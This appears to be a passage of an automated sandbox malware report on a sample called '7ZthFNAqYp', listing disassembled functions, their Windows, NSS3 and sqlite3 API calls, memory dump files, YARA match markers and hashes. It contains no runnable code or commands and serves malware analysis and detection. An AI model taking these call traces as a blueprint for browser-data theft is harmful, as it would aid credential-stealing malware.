                                                                                                                                                                                                                • Part of subcall function 00928048: LocalAlloc.KERNEL32(00000040,?,?,?,00926724,?), ref: 0092806E
                                                                                                                                                                                                                • Part of subcall function 00928048: CryptStringToBinaryA.CRYPT32(00926724,00000000,00000001,00000000,?,00000000,00000000), ref: 00928084
                                                                                                                                                                                                                • Part of subcall function 00928048: LocalFree.KERNEL32(?,?,?,00926724,?), ref: 00928093
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000000), ref: 00935A5A
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00956645), ref: 00935A77
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00935A96
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00956A94), ref: 00935AA7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$File$AllocLocal$BinaryCryptFreeGlobalString_memset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4109952398-0
                                                                                                                                                                                                              • Opcode ID: 7c5896d29d5c798cd30c86665c13adac0aea99e528103e94f452ef8407def156
                                                                                                                                                                                                              • Instruction ID: ae7d422dc14ac9e00ee0b22bbe21350ccf011469573b542fffd2316581f1a877
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c5896d29d5c798cd30c86665c13adac0aea99e528103e94f452ef8407def156
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B712CB5C4022C9BDF21DF64DC45BDAB7BAAF88310F0405E5E908E3250EA729BA58F55
                                                                                                                                                                                                              Function 6CB92D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_initialize.NSS3 ref: 6CB92D9F
                                                                                                                                                                                                                • Part of subcall function 6CA4CA30: EnterCriticalSection.KERNEL32(?,?,?,6CAAF9C9,?,6CAAF4DA,6CAAF9C9,?,?,6CA7369A), ref: 6CA4CA7A
                                                                                                                                                                                                                • Part of subcall function 6CA4CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CA4CB26
                                                                                                                                                                                                              • sqlite3_exec.NSS3(?,?,6CB92F70,?,?), ref: 6CB92DF9
                                                                                                                                                                                                              • sqlite3_free.NSS3(00000000), ref: 6CB92E2C
                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6CB92E3A
                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6CB92E52
                                                                                                                                                                                                              • sqlite3_mprintf.NSS3(6CBFAAF9,?), ref: 6CB92E62
                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6CB92E70
                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6CB92E89
                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6CB92EBB
                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6CB92ECB
                                                                                                                                                                                                              • sqlite3_free.NSS3(00000000), ref: 6CB92F3E
                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6CB92F4C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1957633107-0
                                                                                                                                                                                                              • Opcode ID: 797ecbfd1dcbbd0564158dc962c2737c2cd9ce8d2e1428a063014ed4c2fd2857
                                                                                                                                                                                                              • Instruction ID: 53dc87e11f681d069f241a205cf208b4a704945eaef9a63f4643611a330f2df1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 797ecbfd1dcbbd0564158dc962c2737c2cd9ce8d2e1428a063014ed4c2fd2857
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A619CB5E006558BEB00CFA8D985BDEB7B5EF4A348F144038DC15A7B10E731E859CBA2
                                                                                                                                                                                                              Function 6CAE2C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(6CAE3F23,?,6CADE477,?,?,?,00000001,00000000,?,?,6CAE3F23,?), ref: 6CAE2C62
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C,?,6CADE477,?,?,?,00000001,00000000,?,?,6CAE3F23,?), ref: 6CAE2C76
                                                                                                                                                                                                              • PL_HashTableLookup.NSS3(00000000,?,?,6CADE477,?,?,?,00000001,00000000,?,?,6CAE3F23,?), ref: 6CAE2C86
                                                                                                                                                                                                              • PR_Unlock.NSS3(00000000,?,?,?,?,6CADE477,?,?,?,00000001,00000000,?,?,6CAE3F23,?), ref: 6CAE2C93
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: TlsGetValue.KERNEL32 ref: 6CB6DD8C
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB6DDB4
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,6CADE477,?,?,?,00000001,00000000,?,?,6CAE3F23,?), ref: 6CAE2CC6
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6CADE477,?,?,?,00000001,00000000,?,?,6CAE3F23,?), ref: 6CAE2CDA
                                                                                                                                                                                                              • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6CADE477,?,?,?,00000001,00000000,?,?,6CAE3F23), ref: 6CAE2CEA
                                                                                                                                                                                                              • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6CADE477,?,?,?,00000001,00000000,?), ref: 6CAE2CF7
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CADE477,?,?,?,00000001,00000000,?), ref: 6CAE2D4D
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CAE2D61
                                                                                                                                                                                                              • PL_HashTableLookup.NSS3(?,?), ref: 6CAE2D71
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CAE2D7E
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07AD
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07CD
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07D6
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA4204A), ref: 6CAB07E4
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,6CA4204A), ref: 6CAB0864
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CAB0880
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,6CA4204A), ref: 6CAB08CB
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(?,?,6CA4204A), ref: 6CAB08D7
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(?,?,6CA4204A), ref: 6CAB08FB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2446853827-0
                                                                                                                                                                                                              • Opcode ID: 618b11cd86a6d29743ab1a988bf18acc2ec9f72fd1b91cc164d08b7fc05440e6
                                                                                                                                                                                                              • Instruction ID: e2aa3611d7a1cb533576afca0c4af487a21bf1a326940ee5976c3340657ffb0f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 618b11cd86a6d29743ab1a988bf18acc2ec9f72fd1b91cc164d08b7fc05440e6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D511AB6D00105ABDB009F35DC859AA7778FF09358B188624ED1997B12E731EDE8C7E1
                                                                                                                                                                                                              Function 6CAD7C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_CallOnce.NSS3(6CC22120,6CAD7E60,?,?,?,?,?,6CB551DF,6CB55990,00000000), ref: 6CAD7C81
                                                                                                                                                                                                                • Part of subcall function 6CA44C70: TlsGetValue.KERNEL32(?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44C97
                                                                                                                                                                                                                • Part of subcall function 6CA44C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44CB0
                                                                                                                                                                                                                • Part of subcall function 6CA44C70: PR_Unlock.NSS3(?,?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44CC9
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CAD7CA0
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CAD7CB4
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAD7CCF
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: TlsGetValue.KERNEL32 ref: 6CB6DD8C
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB6DDB4
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CAD7D04
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CAD7D1B
                                                                                                                                                                                                              • realloc.MOZGLUE(-00000050), ref: 6CAD7D82
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAD7DF4
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAD7E0E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2305085145-0
                                                                                                                                                                                                              • Opcode ID: 78d88ea85f26ea83b27194d609c025f115276bf69c3273fd84d98a276d6fd71d
                                                                                                                                                                                                              • Instruction ID: fb1c3e72f9811127f6d16909b89c8a17bfab05ac35e001773c9ccf0da7badf78
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 78d88ea85f26ea83b27194d609c025f115276bf69c3273fd84d98a276d6fd71d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A951F371A241019FDF04AF29DC55F6977B5FB02328F2A412AED44C7B25EB31E8D4CA81
                                                                                                                                                                                                              Function 6CA44C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44C97
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44CB0
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44CC9
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44D11
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44D2A
                                                                                                                                                                                                              • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44D4A
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44D57
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44D97
                                                                                                                                                                                                              • PR_Lock.NSS3(?,?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44DBA
                                                                                                                                                                                                              • PR_WaitCondVar.NSS3 ref: 6CA44DD4
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44DE6
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44DEF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3388019835-0
                                                                                                                                                                                                              • Opcode ID: 1fe3fd873911019cdfb742998d8f14d64c42931644eaf8780090c761d08367b9
                                                                                                                                                                                                              • Instruction ID: 0f0a6cb45330fb99abeaffd8cd24342279a16456c99ca96ceee4766bc657e928
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fe3fd873911019cdfb742998d8f14d64c42931644eaf8780090c761d08367b9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 304169B5A24A55CFCB00AF79D08555DBBB4FF05314F098669D8989BB00E730D8C4CB81
                                                                                                                                                                                                              Function 00948CA4 Relevance: 18.1, APIs: 12, Instructions: 95COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3833677464-0
                                                                                                                                                                                                              • Opcode ID: 6ae70586c945489fa7e1a8ec60b9757655e23a0fb3b1416f9665ace8363d4275
                                                                                                                                                                                                              • Instruction ID: ba7e0991d85a3d321ba6d07db2a106c8d9f2ccfdcc39be581ffb1fdf58742211
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ae70586c945489fa7e1a8ec60b9757655e23a0fb3b1416f9665ace8363d4275
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53210B35146601ABD7227F24D942F1FB7E8DFD2761F20842EF5D497192EF328C008A61
                                                                                                                                                                                                              Function 009215E6 Relevance: 18.0, APIs: 12, Instructions: 50windowmemoryregistryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009215BC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 009215C6
                                                                                                                                                                                                                • Part of subcall function 009215BC: HeapAlloc.KERNEL32(00000000), ref: 009215CD
                                                                                                                                                                                                              • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 00921606
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0092160C
                                                                                                                                                                                                              • SetCriticalSectionSpinCount.KERNEL32(00000000,00000000), ref: 00921614
                                                                                                                                                                                                              • GetWindowContextHelpId.USER32(00000000), ref: 0092161B
                                                                                                                                                                                                              • GetWindowLongW.USER32(00000000,00000000), ref: 00921623
                                                                                                                                                                                                              • RegisterClassW.USER32(00000000), ref: 0092162A
                                                                                                                                                                                                              • IsWindowVisible.USER32(00000000), ref: 00921631
                                                                                                                                                                                                              • ConvertDefaultLocale.KERNEL32(00000000), ref: 00921638
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00921644
                                                                                                                                                                                                              • IsDialogMessageW.USER32(00000000,00000000), ref: 0092164C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00921656
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092165D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Window$MessageProcess$AllocByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiRegisterSectionSpinVisibleWide
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3627164727-0
                                                                                                                                                                                                              • Opcode ID: 1f9d53be88d1b66a6d638faff8e7fa6177d5a2b40bd1b68d3aa28c336c73c25d
                                                                                                                                                                                                              • Instruction ID: b7d45e385f48b6b6b3be2de0e3ff544718285c5800f720d9fcef5300975074ee
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f9d53be88d1b66a6d638faff8e7fa6177d5a2b40bd1b68d3aa28c336c73c25d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C015C72416624FBC7116BB2AD0DDDF3F6CEE8A353B040045F51A910608B784641EBFA
                                                                                                                                                                                                              Function 6CBD7CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CBD7CE0
                                                                                                                                                                                                                • Part of subcall function 6CB89BF0: TlsGetValue.KERNEL32(?,?,?,6CBD0A75), ref: 6CB89C07
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CBD7D36
                                                                                                                                                                                                              • PR_Realloc.NSS3(?,00000080), ref: 6CBD7D6D
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CBD7D8B
                                                                                                                                                                                                              • PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6CBD7DC2
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CBD7DD8
                                                                                                                                                                                                              • malloc.MOZGLUE(00000080), ref: 6CBD7DF8
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CBD7E06
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
                                                                                                                                                                                                              • String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
                                                                                                                                                                                                              • API String ID: 530461531-3274975309
                                                                                                                                                                                                              • Opcode ID: 56abffe12644c0080e65b8846a22ddae28b8fb8de62e7fdcc601ed53dfa3b937
                                                                                                                                                                                                              • Instruction ID: e7d17b522d4a895283bb8894bc73e121e5b1ad7b9022b05da20a038e09de3adc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56abffe12644c0080e65b8846a22ddae28b8fb8de62e7fdcc601ed53dfa3b937
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E241D6F19002919FDB04CF28DC809AB77B6FF80318B26456CE819ABB55D771F855CBA1
                                                                                                                                                                                                              Function 6CB0ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CB0DE64), ref: 6CB0ED0C
                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB0ED22
                                                                                                                                                                                                                • Part of subcall function 6CB1B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBF18D0,?), ref: 6CB1B095
                                                                                                                                                                                                              • PL_FreeArenaPool.NSS3(?), ref: 6CB0ED4A
                                                                                                                                                                                                              • PL_FinishArenaPool.NSS3(?), ref: 6CB0ED6B
